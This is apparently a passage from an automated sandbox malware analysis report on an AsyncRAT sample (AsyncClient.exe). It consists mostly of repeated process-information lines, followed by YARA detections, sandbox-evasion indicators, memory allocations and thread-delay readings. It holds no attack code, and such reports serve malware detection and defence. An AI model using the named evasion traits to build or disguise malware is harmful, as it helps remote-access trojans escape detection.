                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AsyncRAT
                    Source: Yara matchFile source: AsyncClient.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.AsyncClient.exe.630000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1429164611.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3883921677.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: AsyncClient.exe PID: 4300, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: AsyncClient.exeBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\AsyncClient.exeMemory allocated: FD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeMemory allocated: 2950000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeMemory allocated: 4950000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeMemory allocated: 2B30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeMemory allocated: 4CF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeMemory allocated: 12D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeMemory allocated: 2C60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeCode function: 5_2_07326F60 rdtsc 5_2_07326F60
                    Source: C:\Users\user\Desktop\AsyncClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeWindow / User API: threadDelayed 8691Jump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeWindow / User API: threadDelayed 1154Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3680Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 635Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeWindow / User API: threadDelayed 886Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeWindow / User API: threadDelayed 360Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeWindow / User API: threadDelayed 8228Jump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeAPI coverage: 3.1 %
                    Source: C:\Users\user\Desktop\AsyncClient.exe TID: 6848Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exe TID: 6756Thread sleep count: 35 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exe TID: 6756Thread sleep time: -32281802128991695s >= -30000sJump to behavior
